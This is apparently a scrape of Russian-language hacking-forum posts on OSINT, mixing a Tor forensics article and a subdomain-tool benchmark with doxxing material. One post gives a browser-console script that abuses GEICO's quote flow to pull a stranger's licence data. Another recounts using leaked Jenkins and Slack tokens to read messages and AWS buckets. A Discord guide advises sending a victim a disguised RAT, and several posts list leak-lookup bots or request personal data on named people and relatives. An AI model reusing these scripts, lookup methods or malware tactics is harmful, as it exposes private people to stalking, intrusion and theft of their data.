Все эти маленькие особенности помогут найти другие аккаунты на других форумах, в социальных сетях и так далее. Говорят, что именно такие ошибки допускал Росс Ульбрихт, владелец крупного маркетплейса Silk Road.
Существуют разные типы инструментов для сбора данных в интернете.
Эти инструменты полезны при анализе сайтов в сети Tor. Они помогают собрать информацию о фотографиях, директориях и самую разную информацию о структуре сайтов. Интересны они тем, что дают максимум сведений о том, что происходит на сайте, без посещения самого сайта.
Начнем с краулеров, их можно использовать для сбора определенного типа данных на сайте, к примеру фото, видео, текста и так далее. Например, ты хочешь перебрать все фото на сайте и найти те, которые содержат метаданные.
Вот несколько краулеров для Onion:
Скреперы работают по заданному алгоритму, который определяет, какие данные нужно собирать и как их извлекать. Обычно они делают запросы к серверу, а затем анализируют полученный HTML, чтобы извлечь нужную информацию. В ход идут разные методы разбора страниц — парсинг HTML, поиск по тегам и классам CSS, регулярные выражения и так далее. Часто сайты выгружаются целиком для дальнейшего анализа.
Вот некоторые программы и библиотеки для скрепинга:
Пауки же предназначены для индексации сотен и тысяч ссылок. Для Tor существуют Onioff и Onion Spider.
Под конец немного затронем тему форензики, а не OSINT. При судебно‑технической экспертизе компьютера, на котором использовался Tor, в первую очередь стоит проверять:
Code:Copy to clipboard
C:\Windows\Prefetch
, где могут находиться файлы, связанные с запуском Tor Browser (исполняемый файл браузера или файлы DLL, загружаемые при его работе). Анализ их временных меток позволяет установить, когда запускался браузер.
Анализ дампов — также неотъемлемая часть судебно‑технической экспертизы. В них содержится масса информации о том, что происходило на компьютере. Захватить дамп оперативной памяти можно, к примеру, при помощи Belkasoft RAM Capturer.
Для анализа реестра может пригодиться программа Regshot.
Для анализа сетевого трафика рекомендую Wireshark и NetworkMiner. Wireshark хорош для выявления разных типов пакетов и фактов установки связей между узлами. Он помогает идентифицировать характеристики протоколов, используемых в Tor. А NetworkMiner специализируется на анализе сетевого трафика и выявлении скрытых связей и закономерностей. NetworkMiner может помочь в обнаружении и анализе активности в сети Tor, включая обмен информацией и использование анонимных прокси‑серверов.
И конечно, нужно изучить базу данных самого Tor Browser. Она находится по такому пути:
Code:Copy to clipboard
TorBrowser\Browser\TorBrowser\Data\Browser\Profile.default
Здесь при определенных настройках браузера может храниться история просмотра, закладки, сохраненные пароли, cookie и другие пользовательские данные.
Изучение данных кошельков Bitcoin — тема отдельная и сложная, но для сбора доказательств можно использовать Internet Evidence Finder.
При видимой анонимности сайтов в Tor всегда есть способы идентифицировать их владельцев. Да, некоторые из них сложны и требуют серьезной работы, но, поскольку администраторы тоже совершают ошибки, нет‑нет да срабатывают. Рекомендую всем, кто занимается подобными расследованиями, не забывать применять не только описанные тактики, но и те методы, которые срабатывают и в клирнете.
автор moonlighted
источник xakep.ru
Мошейники по ру начали акцию по распространению мобильного вредоноса, их сайт
На картинке 1. видно, что приложение "МТС" можно скачать с гугал плея, когда клацаем на download -> билдится уникальный токен в хпх(картинка 2.)
Мошейники немного отсталые, поэтому униказали в поле ввода пример ввода номера с "+7"(картинка 2.), но когда я ввожу номер с "+7", то выдает ошибку(картинка 4.)
На картинке 5. вы можете увидеть, что я ввел номер без "+" и все норм, после "далее" тот самый уникальный токен, который сам по себе является загрузкой апк малвари с сайта(я так понимаю, по логике вещей каждый билд является уникальным, генерится на стороне сервера)
Но еще помимо того, что они тупые и пр0йеб4лись с "+7", они не дропнули
малварь на сервак сайта. Прикрепляю ниже
инфа с whois:
Spoiler: Name Servers:
Spoiler: Другая инфа c регистратора
% TCI Whois Service. Terms of use:
% https://tcinet.ru/documents/whois_ru_rf.pdf (in Russian)
% https://tcinet.ru/documents/whois_su.pdf (in Russian)
domain: MTSMESSAGE.RU
nserver: ns1.beget.com.
nserver: ns1.beget.pro.
nserver: ns2.beget.com.
nserver: ns2.beget.pro.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: BEGET-RU
admin-contact: whois.beget.com
created: 2024-07-11T00:17:24Z
paid-till: 2025-07-11T00:17:24Z
free-date: 2025-08-11
source: TCI
Last updated on 2024-07-12T07:11:31Z
Information Updated: 2024-07-12 07:16:31
Site status:
Status - active
Server Type - nginx-reuseport/1.21.1
будет пополняться по мере сбора инфы, также будет круто, если неравнодушные заинтересуются данным ресурсом в т.ч не как целью для исследования, а как просто ЦЕЛЬЮ))(во благо отечества)
![privacytests.org](/proxy.php?image=https%3A%2F%2Fprivacytests.org%2Findex- preview.png&hash=49026e91cd4ef6d250c6db8e7869b6e8&return_error=1)
An open-source privacy audit of popular web browsers.
privacytests.org
Приветствую.
Подскажите плиз какие-нибудь аналоги "Глаза Бога" в виде ботов или веб-сайтов,
можно платные.
И существует ли osint-поисковик по инстаграму или фб ?
Спасибо
Возможно ли через ТП каким-то образом получить данные на кого домен? по типу
фио и номер телефона?
Извиняюсь если ошибся разделом, вопрос имеется ввиду на практике такое
реализовать возможно вообще?
Осинтеры, есть в открытом доступе(нет) база всех компаний онли USA? Которую
можно одним нажатием скачать и не ебать себе мозги.
Нужный формат:
Code:Copy to clipboard
morgan.com - Morgan LLC
morgan-LLC.com - Morgan M.E.
morgan-morgan.com - Morgan Jobs Interprise
Либо может у кого выйдет спарсить по моим требованиям
UPD: Человека нашел, благодарю.
Привет , я Траффер и недавно (даже давно) , заинтересовался Осинтом. Я хочу научится это не для злоумышлыенных целей а для того чтобы меня боялись кинуть) . Также осинт это хороший прогресс , а кто не прогрессирует , тот отстает. Буду принателен если вы дадите парочку мануалов.
I am looking about some pages like is snusbas, dehashed... some pages where they are regularly recorded new databases. Deas anybody know about that?
кто-нибудь знает, как можно парсить сервисы Getcontact, truecaller, callup? В том виде, в котором это делают информационные системы?
Нашёл его с помощью дорков, раньше подобного не встречал.
buy.geico.com/nb#/sale/customerinformation/gskmsi?id=)
![auto-buy.geico.com](/proxy.php?image=https%3A%2F%2Fauto- buy.geico.com%2Ffavicon.ico&hash=509e25a599a4774ed8ade621e3cb6f0a&return_error=1) auto-buy.geico.com
Если выкидывает на главную - чистите куки и переходите по ссылке по новой
Тыкаем Auto И жмем Next
Вводим дату рождения и жмем Next
Вводим ФИО и жмем Next
Вводим адрес и жмем next
По идее на этой странице мы уже ловим деклайн, либо покажет выбор машины КХ, либо что-то еще - это не важно
Открываем консоль разработчика и вставляем туда код (Если делаете в FF То может понадобится перед вставкой написать "allow pasting" либо "разрешить вставку":
var verifToken = $('input[name="__RequestVerificationToken"]').attr('value');
var response = await fetch("https://auto-buy.geico.com/Sale/summary/gskmsi", {
"headers": {
"__requestverificationtoken": verifToken,
"accept": "application/hal+json",
"accept-language": "en-US;q=0.9,en;q=0.8",
"geicobusinessapihost": "https://auto-buy.geico.com/",
"x-requested-with": "XMLHttpRequest"
},
"method": "GET",
"mode": "cors",
"credentials": "include"
});
var responseText = await response.text();
JSON.parse(responseText)._embedded.DriverItemResources._resources[0].CurrentLicenseState
a) Косячная фуллка (лучше скорректировать по чекпиплу, может помочь например поиск по одному из прошлых адресов КХ вместо текущего)
б) У КХ нет прав
в) Сайт просто не нашел DL кх по базам
г) Нужно почистить куки
Если это что-то новое для вас, просьба не жмотить и поставить лайк)
Ищу бота, который дает возможность выгрузки с базы утечек intelx. Естесственно
платный бот.
В телеге нашел пару, но пахнет скамом.
Буду признателен за помощь.
В один прекрасный день среди потока статей, ссылки на которые появляются в моем твиттере, я поделился статьей Avinash'а об утечках данных. Параллельно я как раз работал над тем, чтобы укрепить периметр своих ресурсов, и эта статья была как никогда кстати. Результат моей работы вылился в то, что вы читаете сейчас.
Читая оригинальную статью от Avinash, я обратил внимание на дорки, которые опубликовал автор - среди них были запросы в Shodan для поиска машин с Jenkins и SonarQube. Если работа с дорками не составляет для меня особого труда, то с этими системами я столкнулся впервые, и это меня очень сильно заинтересовало. Я начал с ручного поиска в Shodan и получил в ответе от сервиса более 5000 результатов для Jenkins и еще около 2000 для SonarQube. Проверив пару штук вручную, я приступил к тому, что делаю лучше всего - автоматизация! Пусть машины делают то, что у них получается лучше всего : P)
В итоге я получил 5000 URL-адресов, на каждый из которых можно было свободно зайти, увидеть панель управления Jenkins и проверить ее на предмет наличия утечек. Так как я не знал, где и какая утечка может быть, я проверил вручную несколько URL-адресов, чтобы понять примерно то, что мне нужно искать. Но никаких особых признаков я не обнаружил, которые можно было бы легко детектировать при проверке ссылок скриптом. Единственное, что я мог сделать - продолжить поиски, заходя на страницы и искать какую - либо интересную информацию, вроде имен или чего - нибудь еще.
Вот следующий этап автоматизации, « заскриншоть их все ». У меня уже был подобный опыт, когда я использовал chrome_shots для скриншота большого количества страниц. Теперь, имея на руках ~ 2000 скриншотов, я, очевидно, начал просматривать их - один за другим.
В конце концов я наткнулся на экземпляр, который собирал билды для компании, которую я не имею права называть (в дальнейшем будем называть ее «redacted.com»). С надеждой я начал штудировать журналы консоли. Хотя Jenkins и скрывает большинство секретных данных звездочками, всегда есть надежда найти какие - нибудь баги. В результате я обнаружил accessToken и данные для входа от root-пользователя:
Проверив их на валидность и убедившись в наличие соответствующих прав доступа, я попытался получить список каналов и пользователей из каталога Slack и у меня это получилось. Всего было около 1000 каналов и 200 сотрудников. После этого я собрал список их конференций и выгрузил часть переписок с использование Slack API (в том числе сообщения из той, что упоминается на скриншоте выше - mstats_dev_alerts). Собрав все данные воедино, я понял, что о них лучше сообщить их владельцам.
На сайте redacted.com не было общедоступной страницы вознаграждения за ошибки, поэтому я не знал, как связаться с "нужным" человеком в компании. Стоит упомянуть, что мой предыдущий опыт работы с индийскими компаниями нельзя назвать удачным. Однажды я обратился к консультанту на сайте со своим отчетом с CSRF, которая настойчиво продолжала спрашивать у меня: «Сэр, с какой проблемой вы столкнулись?». Это был один авторитетный индийский портал бронирования путешествий. Именно тогда Avinash Jain (@ logicbomb_1) снова помог мне (у него большой опыт работы с индийскими компаниями, своего рода эксперт на индийской сцене багов). Я составил письмо и отправил его соответствующим контактным лицам, которые приняли бы верное (для меня) решение.
Click to expand...
Тем временем я начал оценивать глубину своего подвига. Как вы можете видеть из скриншота выше, там могло было быть довольно много «интересных» каналов с конфиденциальной информацией. Я вытащил оттуда парочку сообщений, содержащих данные от aws, отправленные ботом пользователю. Люди даже делились « паролем Wi-Fi » на «общем » канале! Это было действительно глупо.
Используя найденные учетные данные, я мог собрать информацию об их амазоновских корзинах и даже читать / записывать в них любые данные, при этом, в некоторые из них была записана кодовая база клиентского приложения.
Поиск по номеру телефона России
1. AVinfoBot (https://avclick.me/v/AVinfoBot) (r) — находит аккаунты,
недвижимость, автомобили, объявления, для бесплатного поиска нужно пригласить
другой аккаунт
2. getcontact.com (r) — выдает как записан номер в контактах
3. @OffThisContactBot — поиск в утечках, ищет как записан номер в
контактах, большая база контактов, бесплатно подключите свой бот
4. truecaller.com (r) — телефонная книга, ищет имя и оператора телефона
5. spravnik.com — поиск по городскому номеру телефона, найдет ФИО и адрес
6. m.ok.ru (https://m.ok.ru/dk?st.cmd=accountRecoverFeedbackForm) —
показывает часть номера телефона, email, фамилии и полностью город с датой
регистрации, используй во вкладке инкогнито
7. smartsearchbot.com — бот находит ФИО, email, объявления, бесплатный
поиск не доступен для новых пользователей
8. list-org.com (https://www.list-org.com/?search=phone) — найдет
организацию в РФ
9. odyssey-search.info (r) — сыщет ФИО, объявления Avito, автомобили,
документы, места работы, контакты, а при регистрации можно указать любую
российскую организацию
10. find-org.com — найдет компанию в РФ
11. SaveRuData (https://data.intelx.io/saverudata/) — покажет, полный
адрес, имя, все из сервиса Яндекс Еда, СДЕК, траты на еду за 6 месяцев,
работает через VPN
12. x-ray.contact (https://x-ray.contact/ru-search) (r) — в утечек
найдет имя, аккаунты, адреса, почту, вход из России запрещён, нужен VPN
13. @Zernerda_bot — ищет в двухсот слитых базах, находит адреса, имена,
аккаунты и много другого, бесплатный поиск после первого запуска бота
14. @Detecta_bot — выдаст аккаунт ВК, ОК, адреса, почту, утечки
15. @data_surf_bot (r) — ищет в утечках, выдает адреса имена, почты и
прочее, одна бесплатная попытка на аккаунт
16. @phonebook_space_bot — найдет имя
17. @cybersecdata_bot (r) — ищет в утечках, дает имена, адреса, почты и
много другого
18. /phone — список ресурсов для поиска по номеру телефона любой страны
Восстановление доступа
1. ICQ (https://icq.com/password/ru)
2. Yahoo (https://login.yahoo.com/?display=login)
3. Adobe (https://account.adobe.com/)
4. Steam (https://help.steampowered.com/ru/wizard/HelpWithLoginInfo/)
5. Xiaomi (https://account.xiaomi.com/pass/retrieve/applyManualRetrieve)
6. Twitter (https://twitter.com/account/begin_password_reset)
7. Facebook (https://www.facebook.com/login/identify?ctx=recover)
8. Microsoft (https://account.live.com/acsr)
9. Instagram (https://www.instagram.com/accounts/password/reset/)
10. Cloud.Huawei.com
(https://id8.cloud.huawei.com/AMW/portal/appealSelf/applyChangeAccount.html)
**Добрый вечер уважаемый читатель. Сегодня, вы окунетесь в мир дискорд osint/csint разведки. Считайте, это подробным гайдом. Итак, как все же вычислить человека, зная его дискорд?
Начнем мы пожалуй с базы.
Итак, у нас есть конкретный обидчик, которого вы хотим наказать.
Первое что приходит в голову, социальная инженерия.
итак, если вы уже установили плохой контакт с обидчиком, мы регистрируем новый
дискорд, заходим на его сервер, притворяемся очень сильным (а можете и не
притворяться) специалистом в области, к которой относится наш обидчик.
Далее путем манипуляции, узнаем его телеграм, вк, инстаграм, фейсбук, ну и
тому подобное.
Если этого не удалось сделать, качаем любой ратник, или прочее вредоносное ПО,
билдим, закидываем нашей жертве под видом условного антикраша (antinuke for
discord server) И готово!
Далее находим на него информацию с помощью самых простых инструментов, думаю, вы без меня их найдете.
Но как же всё таки не используя социальную инженерию, узнать данные обидчика?**
1. мы копируем айди дискорда обидчика
2. заходим в бота @DiscordSensorbot (telegram) и <https://discord-
tracker.com/> Важно проверять информацию на двух ресурсах.
3. начинаем искать человека с помощью google hacking (doorking) (уверяю вас
что то да найдется)
4. Готово!
search all deleted tweets from politicians
Всем Привет) нужна ваша помощь кто что подскажет . Я получил доступ к апи камере , вижу весь периметр дома, подскажите как мне пробить его точное местоположение
Есть байтовая сигнатура допустимF2 FE F2 FE 48 FF 47 FF B9 FF B8 FF 17 00 17
, как можно найти файлы в интернете в которых она присутствует? Any ideas?
**Инструменты подсчета поддоменов
**
Переведено для XSS
Материал - <https://blog.blacklanternsecurity.com/p/subdomain-enumeration-
tool-face-off>
![](/proxy.php?image=https%3A%2F%2Fsubstackcdn.com%2Fimage%2Ffetch%2Fw_1456%2Cc_limit%2Cf_auto%2Cq_auto%3Agood%2Cfl_progressive%3Asteep%2Fhttps%253A%252F%252Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%252Fpublic%252Fimages%252Fc4492049-83ee-46e9-89bd-
db59c584d42c_1200x800.png&hash=a323d02457969e3b4bfb8067cce96c61)
Какой лучший инструмент подсчета поддоменов в 2022 году?
Цель этого противостояния — ответить на этот вопрос, ранжируя лучшие
инструменты подсчета поддоменов на основе:
Количестве поддоменов, которые они могут найти
Времени, необходимое для их поиска
Тестируемые инструменты:
Если вы ветеран OSINT, вы, вероятно, знакомы с большинством инструментов из
этого списка — за исключением, может быть, BBOT.
BBOT — это новый инструмент OSINT, вдохновленный Spiderfoot, написанный здесь,
в Black Lantern Security, и выпущенный чуть более месяца назад. Как и
Spiderfoot, BBOT не является исключительно инструментом перечисления
поддоменов, но мы разработали его с учетом перечисления поддоменов, поэтому мы
выбрали перечисление поддоменов для своего первого реального теста. Тест
перечисления поддоменов кажется хорошим «крещением», которое либо высмеивает,
либо (надеюсь) подтверждает наши усилия по инструменту.
Поделившись результатами, мы рассмотрим точную команду, которую мы запускали для каждого инструмента, и подробности о любых обнаруженных уникальных поддоменах.
**Правила:
Цель: **tesla.com
* Активное перечисление разрешено (HTTP/SSL)
* Только бесплатные API. В этом тесте не будут использоваться платные API.
* Цель этого правила — оценить эффективность инструмента при сборе информации из БЕСПЛАТНЫХ и ОТКРЫТЫХ ИСТОЧНИКОВ без какой-либо утомительной/дорогой предварительной настройки.
* Подстановочные знаки и неразрешенные субдомены не учитываются. Субдомены должны иметь хотя бы одну действующую DNS-запись типа A, AAAA, MX, TXT, NS, SOA, SRV или CNAME. Вывод каждого инструмента будет очищаться одним и тем же методом.
* Брутфорс DNS разрешен. Однако все инструменты будут настроены на использование одного и того же базового списка слов поддоменов. Это предназначено для того, чтобы продемонстрировать уникальные возможности каждого инструмента, а не только его качество списка слов. Кроме того, поскольку время выполнения является фактором, влияющим на результаты, это помогает сделать длительность сканирования более сопоставимой.e.
* Только настройки по умолчанию — никаких странных изменений конфигурации.
* За исключением 1) обычного грубого списка слов и 2) увеличения количества потоков (потому что у нас невероятно быстрый интернет), мы будем использовать настройки инструментов по умолчанию. Значения инструментов по умолчанию всегда должны быть разумными, и мы не будем возиться с ними, поскольку уделение большего внимания настройке одного инструмента может дать ему несправедливое преимущество перед другими.
Сэтап:
Тесты будут выполняться на скромной виртуальной машине Linode со следующими
характеристиками:
Каждый инструмент будет запускаться отдельно, с достаточной паузой между запусками для учета ограничения скорости и т. д.
Результаты:
Анализ:
Истинный победитель этого теста может различаться в зависимости от того, что
важнее для вашего процесса OSINT: скорость или тщательность. Например, BBOT
нашел наибольшее количество поддоменов, но Subfinder нашел 90% того, что
сделал BBOT, и примерно в десятую часть времени.
BBOT использует рекурсивную модель, аналогичную Spiderfoot, что является одной из причин его более высокой доходности поддоменов и, следовательно, более высокого времени выполнения. Но даже с учетом более высокого времени выполнения он значительно превосходит Spiderfoot в целях перечисления субдоменов, как видно из обеих приведенных выше диаграмм. В нашем тестировании мы позволили Spiderfoot работать в течение 48 часов, после чего были вынуждены отменить его.
Одна интересная точка данных, которую мы включили ниже, — это количество уникальных субдоменов, найденных каждым инструментом. Это число рассчитывается путем сравнения выходных данных каждого инструмента с комбинированным выходным сигналом всех других инструментов и выяснения, какие поддомены он нашел, чего не нашел ни один из других.
Модуль massdns BBOT, который сочетает рекурсивную методологию с умными мутациями, гарантирует, что BBOT претендует на наибольшее количество уникальных субдоменов. Amass нашел несколько благодаря своему уникальному модулю Maltiverse, а функция Lepus Markov Chain/Permutation также смогла обнаружить несколько.
Подробности:
# Note: Each tool's default resolver thread count was multiplied by 10 bbot -t tesla.com -f subdomain-enum -m httpx -c modules.massdns.max_resolvers=5000
https://github.com/blacklanternsecurity/bbot
Version : v1.0.3.736 (04 October 2022)
Subdomains : 409
Runtime : 12 minutes 19 seconds
Unique subdomains : 13
[
# Примечание: theharvester не позволяет указать пользовательский список слов, поэтому его словари были изменены вручную. # theharvester не позволяет увеличить количество потоков theHarvester.py --domain tesla.com --dns-lookup --dns-brute --source anubis,baidu,bevigil,binaryedge,bing,bingapi,bufferoverun,censys,certspotter,crtsh,dnsdumpster,duckduckgo,fullhunt,github- code,hackertarget,hunter,intelx,omnisint,otx,pentesttools,projectdiscovery,qwant,rapiddns,rocketreach,securityTrails,sublist3r,threatcrowd,threatminer,urlscan,virustotal,yahoo,zoomeye
](https://substackcdn.com/image/fetch/f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F038c293b-1913-4ee6-94d4-d577066d25fa_636x679.png)
https://github.com/laramies/theHarvester
Version : v4.2.0 (13 August 2022)
Subdomains : 376
Runtime : 7 minutes 10 seconds
Unique subdomains : None
# Примечание: subfinder не поддерживает перебор DNS. subfinder -domain tesla.com -all -t 100
https://github.com/projectdiscovery/subfinder
Version : v2.5.3 (03 August 2022)
Subdomains : 373
Runtime : 1 minute 17 seconds
Unique subdomains : None
# Примечание. Amass не позволяет увеличить количество потоков. amass enum -d tesla.com -active -brute -w subdomains-top1million-5000.txt
https://github.com/OWASP/Amass
Version : v3.20.0 (22 September 2022)
Subdomains : 342
Runtime : 8 minutes 42 seconds
Unique subdomains : 5
# Примечание: oneforall.py не позволяет указать собственный список слов, поэтому его списки слов были изменены вручную. # oneforall.py не допускал увеличения количества потоков oneforall.py --target tesla.com run
https://github.com/shmilylty/OneForAll
Version : v0.4.5 (10 July 2022)
Subdomains : 312
Runtime : 2 minutes 4 seconds
Unique subdomains : 1
# Примечание. Количество потоков распознавателя по умолчанию для каждого инструмента было умножено на 10. lepus.py tesla.com --permutate --reverse --ripe --portscan --markovify -w subdomains-top1million-5000.txt --threads 1000
https://github.com/gfek/Lepus
Version : git clone (05 October 2022)
Subdomains : 171
Runtime : 15 minutes 59 seconds
Unique subdomains :
[
](https://substackcdn.com/image/fetch/f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F7f3cfe22-658d-4310-8aae-390cb8e6dbc4_812x256.png)
# Примечание. Модуль dnsbrute Spiderfoot не поддерживает пользовательские списки слов, поэтому его списки слов были изменены вручную. # Интерфейс командной строки Spiderfoot не поддерживает увеличение количества потоков sf.py -t INTERNET_NAME -n -s tesla.com
https://github.com/smicallef/spiderfoot
Version : v4.0 (07 April 2022)
Subdomains : 129
Runtime : 48+ hours (cancelled)
Unique subdomains : None
# Примечание: Количество потоков распознавателя по умолчанию для каждого инструмента было умножено на 10. # Sublist3r не поддерживает пользовательские списки слов, поэтому его списки слов были изменены вручную. sublist3r.py --domain tesla.com --bruteforce --threads 300
https://github.com/aboul3la/Sublist3r
Version : git clone (04 October 2022)
Subdomains : 46
Runtime : 3 minutes 39 seconds
Unique subdomains : None
Заключение:
Сравнение этих инструментов OSINT было забавным и познавательным упражнением,
и мы надеемся, что вы найдете результаты полезными. Лучшими инструментами
подсчета поддоменов по стандартам этого теста являются:
Может кто помочь с проблемой, произошло небольшое ДТП и нужно связаться с
владельцем, не выходит. может кто помочь?
С956СС55 вот номера
Господа прошу дайте ссылку на github bloom для osint
Крибрум – поисковик, который ищет информацию по ключевому слову не на сайтах, а среди публикаций в соцсетях.
Ссылка на сервис: https://kribrum.io/
Какими способами через зеркало можно выйти на оригинальный сайт а так же узнать владельцев ? Подскажите статьи , инструменты.
Приветствую всех форумчан!
Давно не занимался данной темой, но сейчас появилась необходимость.
1. Есть ли сейчас сервисы отправки смс с подменной имени отправителя? Если
да, то поделитесь по возможности.
2. Остались сервисы по типу "Глаз Бога" или "Химеры" где можно загрузить
массово списки необходимой информации для пробива? В частности необходимо для
получения ФИО, ГОРОД, ТЕЛЕФОН, ПОЧТА, Дата Рождения
Заранее спасибо за любой ответ!
Анализ по стиму
Тут материала не так много но все-же
Первое что делаем копируем id
Делам такой запрос в яндекс выделяем из нашей ссылки на стим id
https://steamcommunity.com/profiles/76561199016504224/
"76561199016504224"
Ну и отчекиваем все ссылки:
Если у пользователя айди стим из буквенных
Делаем такой запрос:
Опять выделяем нашу айдишку, и мониторим сайты если же ничего нету делаем
следующее заходим на этот сайт
![steamid.pro](/proxy.php?image=https%3A%2F%2Fsteamid.pro%2Fog- main.jpg&hash=e98ccdc7a70371e075d7c792613cfaa6&return_error=1)
ãSteam ID Proã- Tool Allows You to Look Up Steam Profileâ¡ Quickly and Easily/ Look Up Steam Profile by Community ID â Steamid â Steamid32 â Steamid64 â URL â Steamid3 â Nameâ
steamid.pro
Вставляем сюда его айдишку буквенную
По итогу получаем:
Из этого извлекаем: вот такие данные
Опять заходим в яндекс и вставляем через "" выданные нам цифры
И находим новые для нас упоминания
Таким образом можно находить упоминания пользователя так-же не будет лишним
прогать ник пользователь в яндекс:
Так-же стоило бы закинуть стим в универсального бота:с
@UniversalSearchEasyBot
Сразу-же проверяет этот стим в архивах:
Так-же советую прогнать стим в фейсит финдер, дает возможность найти фейсит аккаунт пользователя:
Find your FaceIt account by Steam profile link. Check FaceIt ELO and stats for CS2.
faceitfinder.com
Вставляем сюда Steam ID, проверяем, и получаем новый ник для поиска, а также
страну, если пользователь её намеренно не менял, так как страна изначально
устанавливается в зависимости от твоего IP-адреса.
"Получаем новую возможность просматривать ссылки, где пользователи часто
оставляют свои Twitch-аккаунты. Также можно изучить кнопки 'друзья' и хабы, в
которых состоит пользователь, и получить новую информацию. Например, можно
попросить друга из его Faceit дать контакт под каким-то предлогом.
По-поводу самого старта просмотри всех друзей в его стиме
"Также группы. Если нашел группу, созданную им, просмотри её в Яндексе. Иногда
люди в таких группах оставляют ссылки на Discord-серверы или группы ВКонтакте.
Обрати особое внимание на группы с малым количеством участников, так как в них
часто оставляют ссылки на свои контакты, где его можно найти, если знаешь его
имя.
Не будет лишним просмотреть все доступные кнопки которые есть чтобы извлечь
информацию с поверхностной штуки
Так-же сделай обязательно запрос его ника в стиме в вк поиске и ник который
нашел с фейсита туда так-же прогони.
Так-же ники + ссылки который мы получили мы можем вставить в ютуб:
Таким образом можно найти тоже нашего человечка!
------------------------------------------------
Так-же советую просерфить ссылки и ники в этом сервисе https://tgstat.ru/
+ не будет лишним просерфить все ники в Telegramgogo
https://cse.google.com/cse?cx=006368593537057042503%3Aefxu7xprihg&ref=exploit.media#gsc.tab=0
Добрый день
1. @money_cloud_the_mind или @slvestr
2. @pp0bnal или @major777shop
3. @Zloi26
По первым двум нужны ещё по два ближайших родственника.
Цена, сроки, гарантии достоверности информации - в лс
Геолокация фотографий нового поколения на базе искусственного интеллекта. Нужно отправить фотографию. Geovision попытается определить, где оно было снято. Бот абсолютно бесплатный
Бот: @geovisionBot
Бот в телеге сдох походу, а очень нужно о человеке узнать побольше
Всем привет)
Может кто подскажет сервисы (платные и бесплатные) где можно пробивать DL по
US.
Чтобы не только номер DL а еще и issue и expire date выдавало.
Заранее спасибо, даже если никто и не
подскажет...
Знаете, что случилось с Syniverse?
[Андрей Масалович] Охота за информацией в 2021 году. Приемы эффективного поиска. Поиск в невидимом интернете. OSINT. Добыча защищенных данных. Приемы информационного противоборства.
Облако Mail.ru - это ваше персональное надёжное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-13629-102-0-1.202206231259%2Ffavicon.ico&hash=276ea90f9abb5dac994a6eae276257a2&return_error=1) cloud.mail.ru
[Мефодий
Келевра] Osint v.2 "Master OSINT" (2021).
Все в детстве мечтали быть шпионами, разведчиками и вот мечта воплотилась.
Теперь каждый из тех кто читает этот текст, может стать разведчиком не выходя
из дома.
Облако Mail.ru - это ваше персональное надёжное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-13629-102-0-1.202206231259%2Ffavicon.ico&hash=276ea90f9abb5dac994a6eae276257a2&return_error=1) cloud.mail.ru
[Udemy]
Experts with David Bombal - Практический этический взлом для начинающих (2021)
Этот курс предназначен для всех, кто хочет стать этичным хакером, независимо
от вашего текущего уровня навыков. Учебная программа предназначена для
абсолютных новичков, заинтересованных в карьере специалиста по безопасности,
начиная с абсолютных основ тестирования на проникновение и заканчивая
продвинутыми темами и методами. Начните сегодня свою карьеру в сфере
этического взлома.
Облако Mail.ru - это ваше персональное надёжное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-13629-102-0-1.202206231259%2Ffavicon.ico&hash=276ea90f9abb5dac994a6eae276257a2&return_error=1) cloud.mail.ru
[Александр
Тимохин] Интернет-разведчик 1.0 (2021)
• Введение в интернет-разведку
• Правовые основы разведки
• Классификация методов разведки
• Подготовка рабочего места
• Основы анонимности в сети
• Разведывательный цикл
• Основы анализа информации
Облако Mail.ru - это ваше персональное надёжное хранилище в интернете.
![cloud.mail.ru](/proxy.php?image=https%3A%2F%2Fimg.imgsmail.ru%2Fcloud%2Fimg%2Fbuild%2Frelease- cloudweb-13629-102-0-1.202206231259%2Ffavicon.ico&hash=276ea90f9abb5dac994a6eae276257a2&return_error=1) cloud.mail.ru
Курсы по OSINT от Claus
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2Fhr_7APQolQNFon9_GJXMX0hg7gc1kDFHLj8kl00le4QXjJU8nx1wKRcevc5RQZgASGl_UO0Ab9C2WXgknu5ZRO- GjVGl7VefMYHYVGQYLQZJssHQiF9cCFH0LMpPJ4iqILdx4eb76j9mOLGSEo-79sV_cCVBJUGNs9t2gMX8e0iaatBhpxHWo14Rgk85bgPv0HZcy6FUyTk8-1gDlEJxZ5utqD0Cxq73AZRQh44KarckyVol46o7U7KaurFY2tLWUkag8QQ- ppx0Tm7vjUEE0TGTAs8A_LBFGsMr- ROxJpnNEhb7mLCCJqQ9Qjlz922vq6IRr24lECFic2fTPQUNJw.jpg&hash=25c9496f224f279f5cf4244bf0fe41f7&return_error=1)
Используем поисковые системы профессионально - Поиск приватной информации (2020)
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FgTbLGaS3wXpUaCwJem1HQ7BA0iAiTKAHZpkWVjcj7duP_xm258RZ_qF6Yae7Q3-nOZ_Nxb_I4nUKsyKIcVPuI-10ByVzpXLMB1HkmwqJLLaT66geUOQBTwpFUNOaw7oXvFH7oBVVRj4LrirM4m1-8kF2UzlbnrxkQ4copPxZxudCRmsDn0ydo_D29dUqyXf9tslxjYC2OuC92JBn0hPhKR9ujU-e0HCemHG4vseBtaHlyzY6-yJsgBMKG2yT- LuDhqRmrc8v6RHLin5ZIs5HpLuWfPaL6nEqcJvkOJ- Ftm8wt1SqCzjTghxWmdNOtS5vjrnRW2BOfgTv13NCBtub8A.jpg&hash=37b58ab42d60b327c87d0bbc2e44e3a8&return_error=1)
](https://t.me/Searchi_net)
